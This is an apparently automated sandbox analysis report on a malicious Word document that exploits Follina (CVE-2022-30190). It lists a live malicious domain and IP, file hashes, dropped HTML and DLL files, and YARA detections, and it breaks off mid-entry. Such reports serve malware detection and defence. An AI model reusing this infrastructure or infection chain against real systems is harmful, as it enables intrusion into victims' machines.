                                                                                                                              https://outlook.office.com/1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                                                                                                                                		high
                                                                                                                                https://storage.live.com/clientlogs/uploadlocation1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                                                                                                                                  		high
                                                                                                                                  https://outlook.office365.com/1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                                                                                                                                    		high
                                                                                                                                    https://webshell.suite.office.com1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                                                                                                                                      		high
                                                                                                                                      https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                                                                                                                                        		high
                                                                                                                                        https://substrate.office.com/search/api/v1/SearchHistory1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                                                                                                                                          		high
                                                                                                                                          https://management.azure.com/1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                                                                                                                                            		high
                                                                                                                                            https://messaging.lifecycle.office.com/getcustommessage161A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                                                                                                                                              		high
                                                                                                                                              https://clients.config.office.net/c2r/v1.0/InteractiveInstallation1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                                                                                                                                                		high
                                                                                                                                                https://login.windows.net/common/oauth2/authorize1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                                                                                                                                                  		high
                                                                                                                                                  https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  		unknown
                                                                                                                                                  https://graph.windows.net/1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                                                                                                                                                    		high
                                                                                                                                                    https://api.powerbi.com/beta/myorg/imports1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                                                                                                                                                      		high
                                                                                                                                                      https://devnull.onenote.com1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                                                                                                                                                        		high
                                                                                                                                                        https://messaging.action.office.com/1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                                                                                                                                                          		high
                                                                                                                                                          https://ncus.pagecontentsync.1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                          		unknown
                                                                                                                                                          https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                                                                                                                                                            		high
                                                                                                                                                            https://messaging.office.com/1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                                                                                                                                                              		high
                                                                                                                                                              https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                                                                                                                                                                		high

                                                                                                                                                                World Map of Contacted IPs

                                                                                                                                                                • No. of IPs < 25%
                                                                                                                                                                • 25% < No. of IPs < 50%
                                                                                                                                                                • 50% < No. of IPs < 75%
                                                                                                                                                                • 75% < No. of IPs

                                                                                                                                                                Public IPs

                                                                                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                116.203.251.9
                                                                                                                                                                		upgrade.4nmn.comGermany
                                                                                                                                                                		24940HETZNER-ASDEtrue

                                                                                                                                                                General Information

                                                                                                                                                                Joe Sandbox Version:35.0.0 Citrine
                                                                                                                                                                Analysis ID:648583
                                                                                                                                                                Start date and time: 20/06/202208:28:492022-06-20 08:28:49 +02:00
                                                                                                                                                                Joe Sandbox Product:CloudBasic
                                                                                                                                                                Overall analysis duration:0h 6m 44s
                                                                                                                                                                Hypervisor based Inspection enabled:false
                                                                                                                                                                Report type:light
                                                                                                                                                                Sample file name:WF0SlQWKr1.docx
                                                                                                                                                                Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                                Run name:Potential for more IOCs and behavior
                                                                                                                                                                Number of analysed new started processes analysed:42
                                                                                                                                                                Number of new started drivers analysed:1
                                                                                                                                                                Number of existing processes analysed:0
                                                                                                                                                                Number of existing drivers analysed:0
                                                                                                                                                                Number of injected processes analysed:0
                                                                                                                                                                Technologies:
                                                                                                                                                                • HCA enabled
                                                                                                                                                                • EGA enabled
                                                                                                                                                                • HDC enabled
                                                                                                                                                                • AMSI enabled
                                                                                                                                                                Analysis Mode:default
                                                                                                                                                                Analysis stop reason:Timeout
                                                                                                                                                                Detection:MAL
                                                                                                                                                                Classification:mal100.expl.evad.winDOCX@18/44@2/1
                                                                                                                                                                EGA Information:Failed
                                                                                                                                                                HDC Information:Failed
                                                                                                                                                                HCA Information:
                                                                                                                                                                • Successful, ratio: 100%
                                                                                                                                                                • Number of executed functions: 0
                                                                                                                                                                • Number of non-executed functions: 0
                                                                                                                                                                Cookbook Comments:
                                                                                                                                                                • Found application associated with file extension: .docx
                                                                                                                                                                • Adjust boot time
                                                                                                                                                                • Enable AMSI
                                                                                                                                                                • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                                • Attach to Office via COM
                                                                                                                                                                • Scroll down
                                                                                                                                                                • Close Viewer

                                                                                                                                                                Warnings

                                                                                                                                                                • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, backgroundTaskHost.exe, sdiagnhost.exe, mrxdav.sys, BackgroundTransferHost.exe, UpdateNotificationMgr.exe, conhost.exe, SgrmBroker.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
                                                                                                                                                                • TCP Packets have been reduced to 100
                                                                                                                                                                • Excluded IPs from analysis (whitelisted): 52.109.32.24, 52.109.12.24, 52.109.76.35, 52.109.76.34
                                                                                                                                                                • Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, prod-w.nexus.live.com.akadns.net, prod.configsvc1.live.com.akadns.net, ctldl.windowsupdate.com, summit.didns.ru, settings-win.data.microsoft.com, arc.msn.com, ris.api.iris.microsoft.com, go.microsoft.com, store-images.s-microsoft.com, login.live.com, config.officeapps.live.com, sls.update.microsoft.com, nexus.officeapps.live.com, displaycatalog.mp.microsoft.com, officeclient.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, europe.configsvc1.live.com.akadns.net
                                                                                                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                                • Report size getting too big, too many NtQueryVolumeInformationFile calls found.

                                                                                                                                                                Simulations

                                                                                                                                                                Behavior and APIs

                                                                                                                                                                TimeTypeDescription
                                                                                                                                                                08:31:27API Interceptor76x Sleep call for process: powershell.exe modified

                                                                                                                                                                Joe Sandbox View / Context

                                                                                                                                                                IPs

                                                                                                                                                                No context

                                                                                                                                                                Domains

                                                                                                                                                                No context

                                                                                                                                                                ASNs

                                                                                                                                                                No context

                                                                                                                                                                JA3 Fingerprints

                                                                                                                                                                No context

                                                                                                                                                                Dropped Files

                                                                                                                                                                No context

                                                                                                                                                                Created / dropped Files

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.accdb

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                File Type:Microsoft Access Database
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):528384
                                                                                                                                                                Entropy (8bit):0.4754802582989672
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:384:NGfX4CJCmw8SFYfZ0jGBMmnxWBwtZ1IB+hVZO4Fg:YfXPC1HoZiMAB/iI
                                                                                                                                                                MD5:2F97B30E8435890411336A091A4E9BF1
                                                                                                                                                                SHA1:A3392276FE3DF0B8E70B009C0410208C8A3D696A
                                                                                                                                                                SHA-256:0E5BC7D0CC47B23124EC3A260BFCAA36E2584AF750240A5192ACABCD81020D99
                                                                                                                                                                SHA-512:210B18A898828EA57D63A8872A2BD67BE00D06A78EECADE80CC1D2AB0A3FF382B63A9852D7A8FD6167AF0726D371B318693D02D7D2EEEF6D94927B524879C4F2
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:....Standard ACE DB......n.b`..U.gr@?..~.....1.y..0...c...F...N:U.7...z.(...`.:{6I...Z.Cs..3..y[..|*..|.....V.'...f_...$.g..'D...e....F.x....-b.T...4.0.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.ini

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):36
                                                                                                                                                                Entropy (8bit):2.730660070105504
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:5NixJlElGUR:WrEcUR
                                                                                                                                                                MD5:1F830B53CA33A1207A86CE43177016FA
                                                                                                                                                                SHA1:BDF230E1F33AFBA5C9D5A039986C6505E8B09665
                                                                                                                                                                SHA-256:EAF9CDC741596275E106DDDCF8ABA61240368A8C7B0B58B08F74450D162337EF
                                                                                                                                                                SHA-512:502248E893FCFB179A50863D7AC1866B5A466C9D5781499EBC1D02DF4F6D3E07B9E99E0812E747D76734274BD605DAD6535178D6CE06F08F1A02AB60335DE066
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:C.e.n.t.r.a.l.T.a.b.l.e...a.c.c.d.b.

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.laccdb

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):64
                                                                                                                                                                Entropy (8bit):1.3860360556164644
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:OFaV:iu
                                                                                                                                                                MD5:91E91175EF0AB69EE1660DC75973E103
                                                                                                                                                                SHA1:80EB1413A74C338E0F857EA75CBA87BFFA7512D0
                                                                                                                                                                SHA-256:2ACB0CB42BD1E4857BC4A5C1CF20AD3D7969A2E9BA955F313CF6D0A5E0B0FD1B
                                                                                                                                                                SHA-512:03355BA9D7AB8F32BFFD01F5F6D3133958014701D1B24A6318CBD9038E74DAC97AB10A368B407856E43E5B2A0AEEDECF1B67C1FF74B6AF274E20B8F4A1954249
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:878411. Admin.

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\1A14DD78-7595-4E74-B4A0-6406491222F4

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):148957
                                                                                                                                                                Entropy (8bit):5.356714019459071
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:1536:AcQW/gxgB5BQguw5/Q9DQC+zQWk4F77nXmvid3Xx4ETLKz6e:zJQ9DQC+zPXLI
                                                                                                                                                                MD5:4595E386A598DA2BF38F2F011B4DAD46
                                                                                                                                                                SHA1:DF7A8EA141BC22534A314374866C6C6D33E0A53B
                                                                                                                                                                SHA-256:B16E386723A5591BD32FBC5807A228C67E5AC2F9C7DB1D126FE9B171C02378D2
                                                                                                                                                                SHA-512:825094DC0D0786A3AA591014314ED4DD1D95F5BC0CB9D326FC65AC7386093783065FA03FFC1F05836E102D84124E89E32446BE97B0287E37FED61AC8F36166BE
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:<?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2022-06-20T06:29:49">.. Build: 16.0.15414.30527-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\14E38085.htm

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):7402
                                                                                                                                                                Entropy (8bit):5.226010384682191
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:192:tJ5mDtWIDu0GTl9EHbTcKeZEwC8EaKiSe+1hPw6utjdi2UPiqSreh+8G0c:wDwIwERY5V7V2Pijeh+8Dc
                                                                                                                                                                MD5:1752A5A6F9DD417B3B23CAD74B0572DD
                                                                                                                                                                SHA1:F49AEBF28D75BAF7F3BA73B70B475D4669F0D484
                                                                                                                                                                SHA-256:BE10A1D15EBDD53CACBEFB1001DAA750BA33FBEE573A0C4381255AF74A8C78D2
                                                                                                                                                                SHA-512:8D62737424720405830E5E96831C1CDDBDC362EA7EC4D409DC5E05ADA987185115D344943A70BEE0B1EE77FA50B94FD55EDC2662ECB0D030540508BDEF1F58F8
                                                                                                                                                                Malicious:true
                                                                                                                                                                Yara Hits:
                                                                                                                                                                • Rule: SUSP_obfuscated_JS_obfuscatorio, Description: Detect JS obfuscation done by the js obfuscator (often malicious), Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\14E38085.htm, Author: @imp0rtp3
                                                                                                                                                                • Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\14E38085.htm, Author: Joe Security
                                                                                                                                                                Preview:<!doctype html>..<html lang="en">..<head>..<title>..Good thing we disabled macros..</title>..</head>..<body>..<p>..Lorem ipsum dolor sit amet, consectetur adipiscing elit. Quisque pellentesque egestas nulla in dignissim. Nam id mauris lorem. Nunc suscipit id magna id mollis. Pellentesque suscipit orci neque, at ornare sapien bibendum eu. Vestibulum malesuada nec sem quis finibus. Nam quis ligula et dui faucibus faucibus. In quis bibendum tortor.....Curabitur rutrum leo tortor, venenatis fermentum ex porttitor vitae. Proin eu imperdiet lorem, ac aliquet risus. Aenean eu sapien pharetra, imperdiet ipsum ut, semper diam. Nulla facilisi. Sed euismod tortor tortor, non eleifend nunc fermentum sit amet. Integer ligula ligula, congue at scelerisque sit amet, porttitor quis felis. Maecenas nec justo varius, semper turpis ut, gravida lorem. Proin arcu ligula, venenatis aliquam tristique ut, pretium quis velit.....Phasellus tristique orci enim, at accumsan velit interdum et. Aenean nec tristique

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\7BB121F.htm

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):7402
                                                                                                                                                                Entropy (8bit):5.226010384682191
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:192:tJ5mDtWIDu0GTl9EHbTcKeZEwC8EaKiSe+1hPw6utjdi2UPiqSreh+8G0c:wDwIwERY5V7V2Pijeh+8Dc
                                                                                                                                                                MD5:1752A5A6F9DD417B3B23CAD74B0572DD
                                                                                                                                                                SHA1:F49AEBF28D75BAF7F3BA73B70B475D4669F0D484
                                                                                                                                                                SHA-256:BE10A1D15EBDD53CACBEFB1001DAA750BA33FBEE573A0C4381255AF74A8C78D2
                                                                                                                                                                SHA-512:8D62737424720405830E5E96831C1CDDBDC362EA7EC4D409DC5E05ADA987185115D344943A70BEE0B1EE77FA50B94FD55EDC2662ECB0D030540508BDEF1F58F8
                                                                                                                                                                Malicious:true
                                                                                                                                                                Yara Hits:
                                                                                                                                                                • Rule: SUSP_obfuscated_JS_obfuscatorio, Description: Detect JS obfuscation done by the js obfuscator (often malicious), Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\7BB121F.htm, Author: @imp0rtp3
                                                                                                                                                                • Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\7BB121F.htm, Author: Joe Security
                                                                                                                                                                Preview:<!doctype html>..<html lang="en">..<head>..<title>..Good thing we disabled macros..</title>..</head>..<body>..<p>..Lorem ipsum dolor sit amet, consectetur adipiscing elit. Quisque pellentesque egestas nulla in dignissim. Nam id mauris lorem. Nunc suscipit id magna id mollis. Pellentesque suscipit orci neque, at ornare sapien bibendum eu. Vestibulum malesuada nec sem quis finibus. Nam quis ligula et dui faucibus faucibus. In quis bibendum tortor.....Curabitur rutrum leo tortor, venenatis fermentum ex porttitor vitae. Proin eu imperdiet lorem, ac aliquet risus. Aenean eu sapien pharetra, imperdiet ipsum ut, semper diam. Nulla facilisi. Sed euismod tortor tortor, non eleifend nunc fermentum sit amet. Integer ligula ligula, congue at scelerisque sit amet, porttitor quis felis. Maecenas nec justo varius, semper turpis ut, gravida lorem. Proin arcu ligula, venenatis aliquam tristique ut, pretium quis velit.....Phasellus tristique orci enim, at accumsan velit interdum et. Aenean nec tristique

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{21F2D679-65C6-4BB4-9ADF-DADCA6073220}.tmp

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1024
                                                                                                                                                                Entropy (8bit):0.05390218305374581
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:ol3lYdn:4Wn
                                                                                                                                                                MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                                                                                                                                SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                                                                                                                                SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                                                                                                                                SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{EC60D62E-A2BB-4EAD-A7F3-2736EF3773E3}.tmp

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):5336
                                                                                                                                                                Entropy (8bit):4.3471122529747825
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:48:2KYZsXTdv9+DFke04mI8qhi/hFo4EbLDq9+y5HnOojH10+3P1mVZTUGeb8h:2Ymf0g8qMZFkTq99nO4C+yZTRgw
                                                                                                                                                                MD5:DCBCBD09496FFA30068D13DF69F6DDC9
                                                                                                                                                                SHA1:8F1F828DB934341494CDA9AEFB514E52159553DD
                                                                                                                                                                SHA-256:4035CBD73EC382B56E017BAF204393451A88E09F4458264BAD57E759B42E3928
                                                                                                                                                                SHA-512:D4053F13B55EB58CEFB0B82431F3E7CC5162F8466F710A387EF2E1577BDFE8831ED7B1FD22C4F8FEFB7947AB36DC54C5EBC691AFD3F670A0089E0A19B9CF34E5
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:..1.-.E.-.E./. .-.F...A. .F...'./. ...G. ...3... .(.H./... ."...'. .E.3...1. .3.'.2.E.'.F. .*.H.3.7. .E.3.9.H./. .*.:.....1. ...1./.....,.H.'.(.:.....2.-./.1. .E.F.'.(.9. .".E./.G. ...G. .E.-.E./. .-.F...A. .F...'./. .'.2. .7.1...B. .,.D.3.'.*. .B.1.".F... ."...*. .'.D.D.G. .7.'.D.B.'.F... .(.'. .G.E. .".4.F.'. .4./.G. .'.F./. ./.1. .5.H.1.*... ...G. .9.F.H.'.F. .4./.G. . .'.F.G.'. ./.1. .2.F./.'.F. .B.2.D. .B.D.9.G. .(.'. .'.G.E. .".4.F.'. .4./.G. .'.F./.....,.H.'.(.:.......3.-."...'. .E.,.'.G./...F. .........................................................Z...f...h...j...........................................................................................................................................................................................................................................................................$.........A$.a$.gd.z......$.........A$.a$.gd..:.....$.........A$.a$.gdH ......$.........A$.a$.gd.K......$.........A$.a$.gd........$.........A$.a$.gd2N......

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\microsoft[1].htm

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                Category:downloaded
                                                                                                                                                                Size (bytes):7402
                                                                                                                                                                Entropy (8bit):5.226010384682191
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:192:tJ5mDtWIDu0GTl9EHbTcKeZEwC8EaKiSe+1hPw6utjdi2UPiqSreh+8G0c:wDwIwERY5V7V2Pijeh+8Dc
                                                                                                                                                                MD5:1752A5A6F9DD417B3B23CAD74B0572DD
                                                                                                                                                                SHA1:F49AEBF28D75BAF7F3BA73B70B475D4669F0D484
                                                                                                                                                                SHA-256:BE10A1D15EBDD53CACBEFB1001DAA750BA33FBEE573A0C4381255AF74A8C78D2
                                                                                                                                                                SHA-512:8D62737424720405830E5E96831C1CDDBDC362EA7EC4D409DC5E05ADA987185115D344943A70BEE0B1EE77FA50B94FD55EDC2662ECB0D030540508BDEF1F58F8
                                                                                                                                                                Malicious:true
                                                                                                                                                                Yara Hits:
                                                                                                                                                                • Rule: SUSP_obfuscated_JS_obfuscatorio, Description: Detect JS obfuscation done by the js obfuscator (often malicious), Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\microsoft[1].htm, Author: @imp0rtp3
                                                                                                                                                                • Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\microsoft[1].htm, Author: Joe Security
                                                                                                                                                                IE Cache URL:https://upgrade.4nmn.com/microsoft.html
                                                                                                                                                                Preview:<!doctype html>..<html lang="en">..<head>..<title>..Good thing we disabled macros..</title>..</head>..<body>..<p>..Lorem ipsum dolor sit amet, consectetur adipiscing elit. Quisque pellentesque egestas nulla in dignissim. Nam id mauris lorem. Nunc suscipit id magna id mollis. Pellentesque suscipit orci neque, at ornare sapien bibendum eu. Vestibulum malesuada nec sem quis finibus. Nam quis ligula et dui faucibus faucibus. In quis bibendum tortor.....Curabitur rutrum leo tortor, venenatis fermentum ex porttitor vitae. Proin eu imperdiet lorem, ac aliquet risus. Aenean eu sapien pharetra, imperdiet ipsum ut, semper diam. Nulla facilisi. Sed euismod tortor tortor, non eleifend nunc fermentum sit amet. Integer ligula ligula, congue at scelerisque sit amet, porttitor quis felis. Maecenas nec justo varius, semper turpis ut, gravida lorem. Proin arcu ligula, venenatis aliquam tristique ut, pretium quis velit.....Phasellus tristique orci enim, at accumsan velit interdum et. Aenean nec tristique

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\05d3mwhu\05d3mwhu.dll

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):9728
                                                                                                                                                                Entropy (8bit):4.799123416316529
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:96:lKqedmYoNKvUTCSH3gR8H8FgwSHwBmkwZYPaSJ365O1ieMjQZapRnIjlK:cElNK8TCSfHyPmkwZ+vKOWQZwnl
                                                                                                                                                                MD5:6B55DA2550C413C24AD3E6B1452E5E7B
                                                                                                                                                                SHA1:6C1416AB681AAA1F39517F8F48B77FAFFE0E8C19
                                                                                                                                                                SHA-256:AB5C3880822DA837E81B98096E18717BA3920FBA916CBB78621BC4486D3666DB
                                                                                                                                                                SHA-512:86B3C6064FBFE822DA7EB506915D579B3C47CD4A99A822B713D44B280EE1EBD5F67C6BD1DAAE0277024FF73E420923DD66AD71D0974113CB009ABE16BC8F04EA
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......b...........!................^<... ...@....... ....................................@..................................<..K....@.......................`....................................................... ............... ..H............text...d.... ...................... ..`.rsrc........@....... ..............@..@.reloc.......`.......$..............@..B................@<......H........$..4............................................................0..%....... ....s.....r...p.(....,..o....*~....*....0..!....... ....s.......(....,..o....*~....*....0...........(....s......o.........o....*....0..@....... ....s..... ....s........(....s.......o....o....&..o....o....&.*.0...........,.. .+.....o.....+).o......t....~....(....,...t.......(....&.o....-....u........,...o......o......+*..o......t....~....(....,...t.......(....&..o....-.....u........,...o.....*

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\05d3mwhu\CSC34F94DCCCDC94BCAA3A860A33C1ABBE2.TMP

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                File Type:MSVC .res
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):652
                                                                                                                                                                Entropy (8bit):3.113166336265382
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryKg3ak7YnqqxggPN5Dlq5J:+RI+ycuZhNAg3akSxggPNnqX
                                                                                                                                                                MD5:41AA8E063AF95F9B5287C042754F33E6
                                                                                                                                                                SHA1:FE7937D8D73DEAF4E3A85436D2F8D9010BA1AE55
                                                                                                                                                                SHA-256:09F50B0A2D3B529DC681202DF0C56E0E0B7ECA7FA3C40EA11C639D46B58F88CF
                                                                                                                                                                SHA-512:9B82FD012B6B1C2EE8DDF8490CFA08DFEB27F0152E8877B63ABF00095432756BDF263CF978AAB9AE302076C79DDC88D7ADC3CDD43B3B0BA8028461062624699B
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...0.5.d.3.m.w.h.u...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...0.5.d.3.m.w.h.u...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\53i2jeo5\53i2jeo5.dll

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):3584
                                                                                                                                                                Entropy (8bit):3.0829114689436454
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:48:6wpqb927GslPnDRjyJsg6u5k1ulFGa3kFq:6c7GycnvGKk
                                                                                                                                                                MD5:5EE54F420D71BD694604C55EC61101C7
                                                                                                                                                                SHA1:FC539201592B67BC72118091EBEF18A099F0A3D4
                                                                                                                                                                SHA-256:ADD44923DF5389FBD0A2D9AB934AA8F58AEC8F2B6282A0372A5CFF6CDD8ACB29
